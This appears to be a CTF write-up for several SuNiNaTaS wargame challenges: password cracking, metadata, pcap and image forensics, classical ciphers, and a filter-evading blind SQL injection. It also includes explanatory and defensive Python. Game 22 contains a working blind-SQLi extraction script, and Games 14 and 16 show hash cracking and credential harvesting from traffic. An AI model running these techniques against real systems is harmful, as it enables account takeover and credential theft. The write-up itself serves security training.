Hello Navi

note and sharing

challenges

Game 14

Challenge: Password cracking from Linux shadow file

Tool: John the Ripper

Step 1: Extract Archive

tar xf evidence.tar

Step 2: Examine Shadow File

The shadow file contains a hashed password entry:

suninatas:$6$QlRlqGhj$BZoS9PuMMRHZZXz1Gde99W01u3kD9nP/zYtl8O2dsshdnwsJT/1lZXsLar8asQZpqTAioiey4rKVpsLm/bqrX/:15427:0:99999:7:::

Step 3: Prepare for Cracking

Combine passwd and shadow files:

unshadow passwd shadow > unshadow

Step 4: Crack Password

Use John the Ripper with a wordlist:

john unshadow --wordlist=~/ctf/tool/dic/rockyou.txt

Output:

iloveu1         (suninatas)

iloveu1
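The `$6$...` field in the entry above follows the crypt(3) convention: an algorithm id, a salt and the digest, followed by the password-ageing counters in days since 1970-01-01. As an added example (not part of the original write-up), the Python below parses shadow lines into those fields, names the algorithm from the id, converts the day counters to dates, and flags entries a reviewer would want re-hashed. The suninatas line is the one quoted above; the `daemon` and `legacy` lines are constructed.

```python
from datetime import date, timedelta

# Constructed sample: the entry quoted on this page plus two made-up entries
# (a locked system account and a legacy MD5-crypt hash) to exercise the checks.
SAMPLE_SHADOW = """\
suninatas:$6$QlRlqGhj$BZoS9PuMMRHZZXz1Gde99W01u3kD9nP/zYtl8O2dsshdnwsJT/1lZXsLar8asQZpqTAioiey4rKVpsLm/bqrX/:15427:0:99999:7:::
daemon:*:15427:0:99999:7:::
legacy:$1$c0nstrct$0123456789abcdefghijklm:15427:0:99999:7:::
"""

CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}


def parse_hash(field: str) -> dict:
    """Split a crypt(3)-style field into algorithm, optional rounds/cost, salt and digest."""
    if field in ("", "*") or field.startswith("!"):
        return {"algorithm": None, "locked": True}   # no usable hash: locked / no password login
    parts = field.split("$")                        # leading '$' yields an empty first element
    if len(parts) < 4 or parts[0] != "":
        return {"algorithm": "unknown", "locked": False, "raw": field}
    ident = parts[1]
    info = {"algorithm": CRYPT_IDS.get(ident, f"id={ident}"), "locked": False, "rounds": None}
    if ident.startswith("2"):                       # bcrypt: $2b$cost$<22-char salt><31-char digest>
        info["rounds"] = 2 ** int(parts[2])
        info["salt"], info["digest"] = parts[3][:22], parts[3][22:]
    elif parts[2].startswith("rounds="):            # $6$rounds=N$salt$digest
        info["rounds"] = int(parts[2][len("rounds="):])
        info["salt"], info["digest"] = parts[3], parts[4]
    else:                                           # $6$salt$digest (default rounds)
        info["salt"], info["digest"] = parts[2], parts[3]
    return info


def parse_shadow(text: str) -> list:
    """Parse shadow(5) lines: user:hash:lastchange:min:max:warn:inactive:expire:reserved."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 9:
            raise ValueError(f"expected 9 fields: {line!r}")
        e = {"user": f[0], **parse_hash(f[1])}
        e["last_change"] = date(1970, 1, 1) + timedelta(days=int(f[2])) if f[2] else None
        e["min_days"], e["max_days"], e["warn_days"] = (int(x) if x else None for x in f[3:6])
        entries.append(e)
    return entries


def weak_entries(entries: list) -> list:
    """Users whose stored hash is worth flagging: legacy MD5-crypt, or SHA-crypt with very low rounds."""
    flagged = []
    for e in entries:
        if e["locked"]:
            continue
        if e["algorithm"] == "md5crypt":
            flagged.append(e["user"])
        elif e["algorithm"] in ("sha256crypt", "sha512crypt") and e["rounds"] is not None and e["rounds"] < 5000:
            flagged.append(e["user"])
    return flagged


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(e["user"], e["algorithm"], e.get("salt"), e["last_change"])
    print("flagged:", weak_entries(parse_shadow(SAMPLE_SHADOW)))
```

The parser is the useful half: once the salt and algorithm are known, the cracking step above is a matter of throughput, which is why the ageing fields and the algorithm id are what an auditor looks at first.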

Game 15

We're given an mp3 file (diary.mp3). The hex dump reveals ID3 tags and an embedded JPEG with Exif data:

00000000: 4944 3303 0000 0000 6f76 5450 4532 0000  ID3.....ovTPE2..
...
00000080: 0033 f700 0000 696d 6167 652f 6a70 6567 .3....image/jpeg
00000090: 0003 00ff d8ff e000 104a 4649 4600 0101 .........JFIF...
000000a0: 0101 2c01 2c00 00ff e101 8645 7869 6600 ..,.,......Exif.

The flag is in the metadata — exiftool shows it in the Conductor field:

❯ exiftool diary.mp3
...
Conductor : ********************
...
GoodJobMetaTagSearch

The embedded cover art can be extracted with binwalk:

❯ binwalk -e diary.mp3
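What exiftool and binwalk are doing here is walking the ID3v2 tag at the front of the file: the header in the hex dump (`ID3`, version 3, synchsafe size) is followed by frames such as `TPE2`, and the Conductor field is the `TPE3` text frame, while the cover art sits in an `APIC` frame whose MIME type (`image/jpeg`) is followed by the raw JPEG. The following Python is an added example, not code from the write-up; it builds a constructed ID3v2.3 tag with a made-up conductor value and a tiny JPEG stand-in, then parses it back.

```python
import struct


def synchsafe_to_int(raw: bytes) -> int:
    """ID3v2 tag sizes use 7 bits per byte so the size never looks like an MP3 sync word."""
    return (raw[0] << 21) | (raw[1] << 14) | (raw[2] << 7) | raw[3]


def int_to_synchsafe(n: int) -> bytes:
    return bytes([(n >> 21) & 0x7F, (n >> 14) & 0x7F, (n >> 7) & 0x7F, n & 0x7F])


def parse_frames(data: bytes):
    """Yield (frame_id, body) for each frame of an ID3v2.3/2.4 tag at the start of `data`."""
    if data[:3] != b"ID3":
        raise ValueError("no ID3v2 header")
    major = data[3]
    tag_end = 10 + synchsafe_to_int(data[6:10])
    pos = 10
    while pos + 10 <= tag_end:
        frame_id = data[pos:pos + 4]
        if frame_id == b"\x00\x00\x00\x00":
            break                                   # zero padding after the last frame
        raw_size = data[pos + 4:pos + 8]            # v2.3: plain big-endian; v2.4: synchsafe
        size = synchsafe_to_int(raw_size) if major == 4 else struct.unpack(">I", raw_size)[0]
        yield frame_id.decode("ascii"), data[pos + 10:pos + 10 + size]
        pos += 10 + size


def decode_text(body: bytes) -> str:
    """Text frames start with an encoding byte: 0 latin-1, 1 UTF-16 (BOM), 2 UTF-16BE, 3 UTF-8."""
    codec = {0: "latin-1", 1: "utf-16", 2: "utf-16-be", 3: "utf-8"}[body[0]]
    return body[1:].decode(codec).rstrip("\x00")


def decode_apic(body: bytes):
    """APIC layout: encoding, NUL-terminated MIME, picture type, NUL-terminated description, image."""
    mime_end = body.index(b"\x00", 1)
    mime = body[1:mime_end].decode("latin-1")
    pic_type = body[mime_end + 1]                   # 3 = front cover
    desc_start = mime_end + 2
    if body[0] in (1, 2):                           # UTF-16 descriptions end in a double NUL
        desc_end = body.index(b"\x00\x00", desc_start)
        image = body[desc_end + 2:]
    else:
        desc_end = body.index(b"\x00", desc_start)
        image = body[desc_end + 1:]
    return mime, pic_type, image


FRAME_NAMES = {"TPE2": "Band", "TPE3": "Conductor", "TIT2": "Title"}   # exiftool-style labels


def extract_metadata(data: bytes) -> dict:
    """Collect text frames under exiftool-style names plus the embedded cover art."""
    out = {}
    for frame_id, body in parse_frames(data):
        if frame_id.startswith("T"):
            out[FRAME_NAMES.get(frame_id, frame_id)] = decode_text(body)
        elif frame_id == "APIC":
            out["CoverMime"], out["CoverType"], out["Cover"] = decode_apic(body)
    return out


def build_frame(frame_id: bytes, body: bytes) -> bytes:
    return frame_id + struct.pack(">I", len(body)) + b"\x00\x00" + body


def build_sample() -> bytes:
    """Constructed ID3v2.3 tag: band, a conductor frame carrying a made-up value, cover art, padding, a fake audio sync."""
    cover = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x01,\x01,\x00\x00\xff\xd9"
    frames = (build_frame(b"TPE2", b"\x00suninatas")
              + build_frame(b"TPE3", b"\x00CONSTRUCTED_VALUE")
              + build_frame(b"APIC", b"\x00image/jpeg\x00\x03\x00" + cover))
    padding = b"\x00" * 16
    header = b"ID3\x03\x00\x00" + int_to_synchsafe(len(frames) + len(padding))
    return header + frames + padding + b"\xff\xfb\x90\x00"


if __name__ == "__main__":
    md = extract_metadata(build_sample())
    print({k: (v if k != "Cover" else f"{len(v)} bytes") for k, v in md.items()})
```

Because the APIC body is just the JPEG bytes after a few NUL-terminated strings, a signature scanner such as binwalk finds the same image by its `FF D8 FF` marker without understanding ID3 at all.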

Game 16

We have a PCAP (Packet Capture) file to analyze:

❯ 7z x packet_dump.zip
❯ file packet_dump.pcap
packet_dump.pcap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 65535)

Extract credentials by searching for password parameters in the captured network traffic:

❯ strings packet_dump.pcap | grep Hpw=
Hid=suninatas&Hpw=suninatasc
Hid=blackkey&Hpw=blackkeyn
Hid=ultrashark&Hpw=sharkpass01~
Hid=ultrashark&Hpw=%3Dsharkpass01
Hid=ultrashark&Hpw=%3DSharkPass01

Try logging in with each credential pair until one succeeds:

Congratulation! Authkey : ********************************
WireSharkBetterThanWirelessShark
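`strings | grep` works here because the logins were submitted over plain HTTP, so the form fields sit uncompressed inside TCP payloads. An added example (not from the write-up) that does the same job structurally: it walks the classic pcap record format, pulls the payload out of each Ethernet/IPv4/TCP frame and percent-decodes the `Hid`/`Hpw` pairs, which is also why the `%3D` variants above decode to a leading `=`. The capture is constructed inline with checksums left zero; the field names come from the page, the hostnames and addresses are made up.

```python
import re
import struct
from urllib.parse import unquote_plus

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_frame(payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP wrapper (checksums left zero) around an HTTP payload."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes([10, 0, 0, 2]), bytes([10, 0, 0, 1]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(payloads) -> bytes:
    """Write a little-endian pcap: 24-byte global header, then a 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for n, payload in enumerate(payloads):
        frame = build_frame(payload)
        out += struct.pack("<IIII", 1_600_000_000 + n, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap: bytes):
    """Walk pcap records and yield the TCP payload of every IPv4/TCP frame."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only the Ethernet link type is handled")
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                # not IPv4-over-Ethernet carrying TCP
        ihl = (frame[14] & 0x0F) * 4
        tcp = 14 + ihl
        data_off = (frame[tcp + 12] >> 4) * 4
        yield frame[tcp + data_off:]


CRED_RE = re.compile(rb"Hid=([^&\s]+)&Hpw=([^&\s]+)")


def find_credentials(pcap: bytes):
    """Return unique (id, password) pairs from Hid=/Hpw= form fields, percent-decoded."""
    seen = []
    for payload in iter_tcp_payloads(pcap):
        for m in CRED_RE.finditer(payload):
            pair = (unquote_plus(m.group(1).decode("latin-1")),
                    unquote_plus(m.group(2).decode("latin-1")))
            if pair not in seen:
                seen.append(pair)
    return seen


# Constructed traffic in the shape of the capture above (hostnames made up).
SAMPLE_PAYLOADS = [
    b"POST /login.asp HTTP/1.1\r\nHost: example.test\r\n\r\nHid=suninatas&Hpw=suninatasc",
    b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    b"POST /login.asp HTTP/1.1\r\nHost: example.test\r\n\r\nHid=ultrashark&Hpw=%3DSharkPass01",
]

if __name__ == "__main__":
    for user, pw in find_credentials(build_pcap(SAMPLE_PAYLOADS)):
        print(f"{user}: {pw}")
```

The same loop is what a plaintext-credential detection would run against a capture on the defending side: any form submission matching the regex on port 80 is a finding regardless of whether the login succeeded.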

Game 17

We have a QR code image that needs to be processed and decoded. Start by enhancing the image with ImageMagick:

❯ convert qr.png -threshold 85% out.png
❯ convert out.png -background black -alpha remove -alpha off oo.png

The processed image may still be incomplete or corrupted. Use an image editor such as Krita to overlay the three supplied pattern images (the finder patterns, i.e. the position markers in three corners of every QR code) on top of the QR code to restore it.

Once repaired, decode the QR code with zbarimg:

❯ zbarimg oo.png

This yields the flag:

Good Job! Congraturation! AuthKey is YouAreQRCodeMaster~!
YouAreQRCodeMaster~!
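The two steps above, thresholding and re-stamping the finder patterns, can be stated exactly on a module grid. The Python below is an added example (not part of the write-up) and assumes the image has already been sampled to one value per module; it binarises the grid the way `-threshold 85%` does, then writes the 7x7 finder pattern (dark border, light ring, 3x3 dark core) with its light separator into the three corners of an N x N grid, where N is 21 plus a multiple of 4.

```python
DARK_CUTOFF = 0.85   # `convert -threshold 85%`: values below 85% of white become dark


def finder_pattern():
    """7x7 position-detection pattern: dark border, light ring, 3x3 dark core."""
    return [[1 if (r in (0, 6) or c in (0, 6) or (2 <= r <= 4 and 2 <= c <= 4)) else 0
             for c in range(7)] for r in range(7)]


def threshold(gray, pct=DARK_CUTOFF):
    """Binarise a grayscale module grid (0..255) to 1 = dark, 0 = light."""
    cutoff = pct * 255
    return [[1 if v < cutoff else 0 for v in row] for row in gray]


def restore_finders(modules):
    """Stamp the three finder patterns (and their light separators) into the corners of an N x N grid."""
    n = len(modules)
    if n < 21 or (n - 21) % 4 != 0 or any(len(r) != n for r in modules):
        raise ValueError("not a square QR module grid (21 + 4k modules per side)")
    pat = finder_pattern()
    out = [row[:] for row in modules]
    for top, left in ((0, 0), (0, n - 7), (n - 7, 0)):
        # clear the 8x8 area so the separator row/column next to the finder is light
        for r in range(max(0, top - 1), min(n, top + 8)):
            for c in range(max(0, left - 1), min(n, left + 8)):
                out[r][c] = 0
        for r in range(7):
            for c in range(7):
                out[top + r][left + c] = pat[r][c]
    return out


def render(modules) -> str:
    """ASCII view of the grid, handy for eyeballing a repair before running a decoder."""
    return "\n".join("".join("##" if m else "  " for m in row) for row in modules)


def sample_damaged_grid(n=21):
    """Constructed: a pseudo-random grid whose top-left 8x8 corner was wiped to light gray."""
    gray = [[(255 if (r * 7 + c * 3) % 5 else 0) for c in range(n)] for r in range(n)]
    for r in range(8):
        for c in range(8):
            gray[r][c] = 230      # above the 85% cutoff, so the finder thresholds to light
    return gray


if __name__ == "__main__":
    print(render(restore_finders(threshold(sample_damaged_grid()))))
```

Decoders such as zbarimg locate the symbol by those three patterns first, which is why a scan with a corner missing fails outright rather than returning partial data.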

Game 19

We have a large block of binary data. Decode it to get an encrypted message:

0100111001010110010000110101010001000110010001000101
0110001000000100101101000110001000000100101001001100
0100010101011010010001010101001001001011010100100100
1010001000000101001001000101010101010010000001001011
0100011001010101010100100101000000100000010110100100
1010001000000101001000100000010110000100011001000110
0101010100100000010101010101001001010000001000000101
0010010001010101010100100000010100100100110001001011
0101100101000010010101100101000000100000010110100100
1010001000000100011101000011010100100101101001010101
0101010001001011010101110101101001001010010011010101
0110010010010101000001011001010100100100100101010101

Decode as binary to get:

NVCTFDV KF JLEZERKRJ REU KFURP ZJ R XFFU URP REU RLKYBVP ZJ GCRZUTKWZJMVIPYRIU

This text is encrypted with an affine cipher. Use an affine decoder to decrypt:

WELCOME TO SUNINATAS AND TODAY IS A GOOD DAY AND AUTHKEY IS **********************
PLAIDCTFISVERYHARD
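Both steps can be done without an online decoder. The Python below is an added example, not part of the write-up: it joins the bit rows above (each row is 52 bits, so characters straddle line breaks), and then recovers the affine key by trying every valid `a` (coprime with 26) and `b` and keeping the candidate that contains a known word. For this ciphertext the search lands on `a = 1, b = 17`, so the "affine" cipher is a plain Caesar shift.

```python
from math import gcd

# The bit string from this page: 12 rows of 52 bits, 624 bits = 78 ASCII characters.
BITS = """
0100111001010110010000110101010001000110010001000101
0110001000000100101101000110001000000100101001001100
0100010101011010010001010101001001001011010100100100
1010001000000101001001000101010101010010000001001011
0100011001010101010100100101000000100000010110100100
1010001000000101001000100000010110000100011001000110
0101010100100000010101010101001001010000001000000101
0010010001010101010100100000010100100100110001001011
0101100101000010010101100101000000100000010110100100
1010001000000100011101000011010100100101101001010101
0101010001001011010101110101101001001010010011010101
0110010010010101000001011001010100100100100101010101
"""


def bits_to_text(bits: str) -> str:
    """Join the rows, then read 8 bits at a time; the byte boundaries ignore the line breaks."""
    stream = "".join(bits.split())
    if len(stream) % 8:
        raise ValueError(f"{len(stream)} bits is not a whole number of bytes")
    return bytes(int(stream[i:i + 8], 2) for i in range(0, len(stream), 8)).decode("ascii")


def affine_decrypt(ciphertext: str, a: int, b: int) -> str:
    """Inverse of E(x) = (a*x + b) mod 26: D(y) = a^-1 * (y - b) mod 26. Non-letters pass through."""
    if gcd(a, 26) != 1:
        raise ValueError("a must be coprime with 26")
    a_inv = pow(a, -1, 26)
    out = []
    for ch in ciphertext:
        if ch.isalpha():
            y = ord(ch.upper()) - ord("A")
            out.append(chr((a_inv * (y - b)) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def crack_affine(ciphertext: str, crib: str):
    """Try all 12 valid a values x 26 b values; return (a, b, plaintext) for the first hit containing the crib."""
    for a in range(1, 26, 2):
        if gcd(a, 26) != 1:
            continue
        for b in range(26):
            pt = affine_decrypt(ciphertext, a, b)
            if crib in pt:
                return a, b, pt
    return None


def solve(bits: str = BITS, crib: str = "SUNINATAS"):
    return crack_affine(bits_to_text(bits), crib)


if __name__ == "__main__":
    print(bits_to_text(BITS))
    print(solve())
```

With only 312 keys, exhaustive search plus a crib is the whole attack; a frequency count would do if no crib were known.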

Game 18

We have an array of decimal byte values. Print them as a hex string:

# Each entry is a decimal byte value; print the bytes as one continuous hex string
data = [86, 71, 57, 107, 89, 88, 107, 103, 97, 88, 77, 103, 89, 83, 66, 110, 98, 50, 57, 107, 73, 71, 82, 104, 101, 83, 52, 103, 86, 71, 104, 108, 73, 69, 70, 49, 100, 71, 104, 76, 90, 88, 107, 103, 97, 88, 77, 103, 86, 109, 86, 121, 101, 86, 90, 108, 99, 110, 108, 85, 98, 50, 53, 110, 86, 71, 57, 117, 90, 48, 100, 49, 99, 109, 107, 33]
print(''.join(f'{x:02x}' for x in data))

Convert the hex output back to raw bytes with xxd; the result is a base64 string:

❯ python tmp.py > hex.txt
❯ xxd -r -p hex.txt data.bin
❯ cat data.bin
VG9kYXkgaXMgYSBnb29kIGRheS4gVGhlIEF1dGhLZXkgaXMgVmVyeVZlcnlUb25nVG9uZ0d1cmkh

The string is base64-encoded. Decode it:

Today is a good day. The AuthKey is *********************
VeryVeryTongTongGuri!
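The chain here (decimal values, hex, base64, text) is the usual layered-encoding puzzle, and the detour through hex and xxd is unnecessary since the decimal values are already the ASCII codes of the base64 string. As an added example that generalises the page's steps (not code from the write-up), the Python below recognises and strips one layer at a time, checking after each step that the output is still printable so it stops at the real message. The sample is constructed in code from the base64 string shown above by wrapping it in extra hex and bit-string layers.

```python
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable.encode())
BITS_RE = re.compile(rb"^[01]+$")
HEX_RE = re.compile(rb"^[0-9a-fA-F]+$")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")


def looks_printable(b: bytes) -> bool:
    return bool(b) and all(c in PRINTABLE for c in b)


def decimal_list_to_bytes(values) -> bytes:
    """The page's first layer: a list of decimal byte values is just bytes()."""
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("values must be bytes (0..255)")
    return bytes(values)


def peel_once(data: bytes):
    """Strip one encoding layer; return (layer_name, decoded) or None if nothing recognisable applies."""
    stripped = b"".join(data.split())      # all three encodings tolerate whitespace/newlines
    # order matters: a bit string is also valid hex, and a hex string is also valid base64
    if BITS_RE.match(stripped) and len(stripped) % 8 == 0 and len(stripped) >= 16:
        out = bytes(int(stripped[i:i + 8], 2) for i in range(0, len(stripped), 8))
        if looks_printable(out):
            return "binary", out
    if HEX_RE.match(stripped) and len(stripped) % 2 == 0 and len(stripped) >= 4:
        out = binascii.unhexlify(stripped)
        if looks_printable(out):
            return "hex", out
    if B64_RE.match(stripped) and len(stripped) % 4 == 0 and len(stripped) >= 8:
        try:
            out = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            out = None
        if out and looks_printable(out):
            return "base64", out
    return None


def peel_layers(data: bytes, max_layers: int = 8):
    """Repeatedly strip recognised layers; return (names of layers removed, final bytes)."""
    layers = []
    for _ in range(max_layers):
        step = peel_once(data)
        if step is None:
            break
        name, data = step
        layers.append(name)
    return layers, data


def wrap_layers(text: bytes) -> bytes:
    """Constructed encoder used only to build the sample: base64 -> hex -> ASCII bit string."""
    hx = binascii.hexlify(base64.b64encode(text))
    return "".join(f"{c:08b}" for c in hx).encode()


# Constructed sample: the page's base64 string wrapped in two more layers, as decimal values.
SAMPLE_VALUES = list(wrap_layers(b"Today is a good day. The AuthKey is VeryVeryTongTongGuri!"))

if __name__ == "__main__":
    layers, message = peel_layers(decimal_list_to_bytes(SAMPLE_VALUES))
    print(layers, message.decode())
```

The printable check is what keeps the loop honest: a hex string decodes to bytes regardless, but only the intended layer produces text, so the heuristic stops where the author would.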

Game 21

We have a JPEG image to analyze. Check its properties:

❯ file monitor.jpg
monitor.jpg: JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=11, description=SAMSUNG, ...], baseline, precision 8, 640x480, components 3

Check for embedded data with binwalk:

❯ binwalk monitor.jpg
Analyzed 1 file for 85 file signatures (187 magic patterns) in 9.0 milliseconds

Attempting to use stegseek reveals a structural issue:

❯ stegseek monitor.jpg
StegSeek 0.6
Invalid JPEG file structure: two SOI markers

The file contains multiple JPEG images (indicated by multiple Start of Image markers). Extract them using foremost:

❯ foremost monitor.jpg
❯ tree output/
output/
├── audit.txt
└── jpg
    ├── 00000000.jpg
    ├── 00000383.jpg
    ├── 00000765.jpg
    ├── 00001148.jpg
    ├── 00001532.jpg
    ├── 00001914.jpg
    ├── 00002297.jpg
    └── 00002681.jpg

Examine the extracted images to find the flag.

H4CC3R_IN_TH3_MIDD33_4TT4CK
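Both the binwalk extraction in Game 15 and the foremost carve here rest on the same idea: a JPEG starts with the SOI marker `FF D8` and ends with EOI `FF D9`, and stegseek's complaint about "two SOI markers" is simply a count of the former. A naive scan from each SOI to the next EOI breaks on real files, because Exif thumbnails carry their own SOI/EOI inside an APP1 segment. The Python below is an added example (not the write-up's or foremost's code): it walks the marker segments by their lengths, so embedded thumbnails are skipped as part of their APP segment, and only scans for EOI once the SOS marker says entropy-coded data has begun. The sample blob is constructed from two tiny JPEG-shaped byte strings.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA


def count_soi(blob: bytes) -> int:
    """Number of Start-Of-Image markers; more than one is what stegseek refused to work with."""
    return blob.count(b"\xff\xd8\xff")


def jpeg_end(blob: bytes, start: int):
    """Walk marker segments from the SOI at `start`; return the offset just past EOI, or None if the structure breaks."""
    pos = start + 2
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            return None                                 # lost sync: not a marker
        marker = blob[pos + 1]
        if marker == 0xFF:
            pos += 1                                    # fill byte before a marker
            continue
        if marker == EOI:
            return pos + 2
        if marker == SOI:
            return None                                 # a new image began before this one finished
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:
            pos += 2                                    # stand-alone markers carry no length
            continue
        if pos + 4 > len(blob):
            return None
        length = struct.unpack(">H", blob[pos + 2:pos + 4])[0]   # length includes its own 2 bytes
        pos += 2 + length
        if marker == SOS:                               # entropy-coded data: FF is stuffed as FF00,
            idx = blob.find(b"\xff\xd9", pos)           # so the next FFD9 really is the EOI
            return None if idx < 0 else idx + 2
    return None


def carve_jpegs(blob: bytes):
    """Return [(offset, bytes)] for every JPEG whose structure walks cleanly from SOI to EOI."""
    found, pos = [], 0
    while True:
        start = blob.find(b"\xff\xd8\xff", pos)
        if start < 0:
            break
        end = jpeg_end(blob, start)
        if end is not None:
            found.append((start, blob[start:end]))
        pos = start + 2
    return found


def tiny_jpeg(label: bytes) -> bytes:
    """Constructed stand-in for a JPEG: SOI, a COM segment, a minimal SOS header, stuffed entropy bytes, EOI."""
    com = b"\xff\xfe" + struct.pack(">H", 2 + len(label)) + label
    sos = b"\xff\xda" + struct.pack(">H", 2 + 1) + b"\x01"
    scan = b"\x12\x34\xff\x00\x56\x78"
    return b"\xff\xd8" + com + sos + scan + b"\xff\xd9"


def sample_blob() -> bytes:
    """Constructed: two images back to back with filler, like the multi-SOI monitor.jpg above."""
    return b"HDR" + tiny_jpeg(b"first image") + b"\x00" * 7 + tiny_jpeg(b"second image") + b"tail"


if __name__ == "__main__":
    blob = sample_blob()
    print("SOI markers:", count_soi(blob))
    for offset, img in carve_jpegs(blob):
        print(f"jpeg at {offset}, {len(img)} bytes")
```

foremost names its output files by the byte offset of each hit, which is exactly the first element of each tuple here.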

Game 22

This is a blind SQL injection challenge with heavy filtering. Keywords blocked include: select, union, or, whitespace, by, having, from, char, ascii, left, right, delay, 0x.

The goal is to find the admin's password. Start with credentials guest/guest to obtain a valid session.

Use a Python script to extract the password character-by-character via blind SQL injection:

import requests
import string

url = "http://suninatas.com/challenge/web22/web22.asp"
cookies = {
    "ASP.NET_SessionId": "...",
    "auth_key": "...",
    # ... other session cookies
}

charset = string.ascii_letters + string.digits + "!@#$%^&*()_+"
password = ""

for i in range(1, 31):
    found_char = False
    for char in charset:
        # Test: substring(pw, index, length) = char
        # Parentheses stand in for the blocked whitespace; '--' comments out the rest of the query
        payload = f"'and(substring(pw,{i},1)='{char}')--"
        params = {'id': 'admin' + payload, 'pw': 'a'}

        try:
            # Pass params= so requests percent-encodes characters such as #, &, % and +,
            # which would otherwise be misread as part of the query string itself
            r = requests.get(url, params=params, cookies=cookies)
            if "OK" in r.text:
                password += char
                print(f"[+] Found char at index {i}: {char}")
                found_char = True
                break
        except Exception as e:
            print(f"[!] Error: {e}")

    if not found_char:
        break

print(f"[SUCCESS] Final Password: {password}")

Running the script reveals the admin password:

[+] Found char at index 1: N
[+] Found char at index 2: 1
[+] Found char at index 3: c
[+] Found char at index 4: 3
[+] Found char at index 5: B
[+] Found char at index 6: i
[+] Found char at index 7: l
[+] Found char at index 8: n
[+] Found char at index 9: l
[+] Found char at index 10: )
[+] Found char at index 11: +
[+] Found char at index 12: +
...
N1c3Bilnl)
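The keyword blocklist in this challenge is a good illustration of why blocklists do not fix injection: the probe above uses none of the blocked words and no whitespace, so the filter passes it straight into a string-built query. The Python below is an added example, not the write-up's code, using the standard-library `sqlite3` module rather than the challenge's ASP backend; the table, column names and the admin password are constructed, and SQLite spells the function `substr`, so the probe is written that way. It reproduces the filter, shows the boolean probe succeeding against a concatenated query, and shows the same input being inert against a parameterised one.

```python
import sqlite3

# The keyword blocklist from the challenge text; whitespace is checked separately.
BLOCKED = ["select", "union", "or", "by", "having", "from", "char", "ascii",
           "left", "right", "delay", "0x"]


def is_blocked(value: str) -> bool:
    """Mimic the challenge's filter: reject any blocked substring or any whitespace."""
    low = value.lower()
    return any(k in low for k in BLOCKED) or any(c.isspace() for c in value)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table; the admin password is a made-up value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, pw TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("guest", "guest"), ("admin", "Hunter2-constructed")])
    return conn


def login_vulnerable(conn, user: str, pw: str) -> bool:
    """String-built query: the shape the blind injection above depends on."""
    sql = f"SELECT 1 FROM users WHERE id='{user}' AND pw='{pw}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, user: str, pw: str) -> bool:
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    sql = "SELECT 1 FROM users WHERE id=? AND pw=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None


def probe(conn, login, index: int, guess: str) -> bool:
    """One boolean probe in the page's no-whitespace style: does character `index` of admin's pw equal `guess`?"""
    user = f"admin'and(substr(pw,{index},1)='{guess}')--"
    return login(conn, user, "a")


def demo() -> dict:
    conn = make_db()
    user = "admin'and(substr(pw,1,1)='H')--"
    return {
        "filter_passes": not is_blocked(user),                 # the blocklist does not catch it
        "vulnerable_true": probe(conn, login_vulnerable, 1, "H"),
        "vulnerable_false": probe(conn, login_vulnerable, 1, "X"),
        "safe_probe": probe(conn, login_safe, 1, "H"),         # bound as a literal id: no such user
        "safe_real_login": login_safe(conn, "admin", "Hunter2-constructed"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The difference between the two login functions is the whole fix: with bound parameters there is no query text for the probe to alter, so the "OK"/"not OK" oracle the script relies on disappears, and the blocklist becomes unnecessary rather than insufficient.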